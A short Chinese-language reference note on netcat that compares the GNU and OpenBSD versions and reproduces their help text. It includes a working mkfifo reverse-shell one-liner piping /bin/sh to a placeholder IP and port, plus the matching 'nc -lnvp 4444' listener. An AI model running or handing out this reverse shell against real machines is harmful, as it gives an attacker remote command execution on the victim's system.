Nc

Nc

nc(Netcat)是一个功能强大的网络工具,常用于网络调试和数据分析。它可以用来建立TCP或UDP网络连接,传输数据,监听端口等。由于其多功能性和灵活性,nc 被称为“网络工具中的瑞士军刀”。

需要注意的是 nc 分为 GNU 版本的和 OpenBSD 版本的,OpenBSD 参数和 gun 版本的是不一样的,OpenBSD 的不支持 -e 参数,所有不能用 -e 实现反弹shell,只能通过其他方式实现。

mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc IP 端口 > /tmp/f

监听方

# 启动一个 Netcat 服务器,监听本地的 4444 端口,等待客户端的连接
nc -lnvp 4444

GUN 版本的帮助信息

连接到某处:   nc [-选项] 主机名 端口[端口] ...
监听入站连接:     nc -l -p 端口 [-选项] [主机名] [端口]
选项:
        -c shell 命令       如同 `-e'; 使用 /bin/sh 执行 [危险!!]
        -e 文件名             连接后执行的程序 [危险!!]
        -b                      允许广播
        -g 网关                源路由跳点[s],最多 8 个
        -G 数值                源路由指针:4, 8, 12, ...
        -h                      这部分说明
        -i 秒                 发送的行、扫描的端口之间的延迟间隔
        -k                      在套接字上设置保持活动选项
        -l                      监听模式,用于入站连接
        -n                      仅使用数字 IP 地址,不使用 DNS
        -o 文件                 流量的十六进制转储
        -p 端口                 本地端口号
        -r                      随机化本地和远程端口
        -q 秒                 标准输入的 EOF 后等待秒数然后退出
        -s 地址                 本地源地址
        -T 服务类型            设置服务类型
        -t                      回应 TELNET 协商
        -u                      UDP 模式
        -v                      详细输出 [使用两次以获得更详细的输出]
        -w 秒                 连接和最终网络读的超时时间
        -C                      发送 CRLF 作为行结束符
        -z                      零-I/O 模式 [用于扫描]
端口号可以是单个或范围:低-高 [包含];
端口名称中的连字符必须用反斜杠转义 (例如 'ftp\-data')。

OpenBSD 版本的帮助信息

usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
          [-m minttl] [-O length] [-P proxy_username] [-p source_port]
          [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
          [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
          [destination] [port]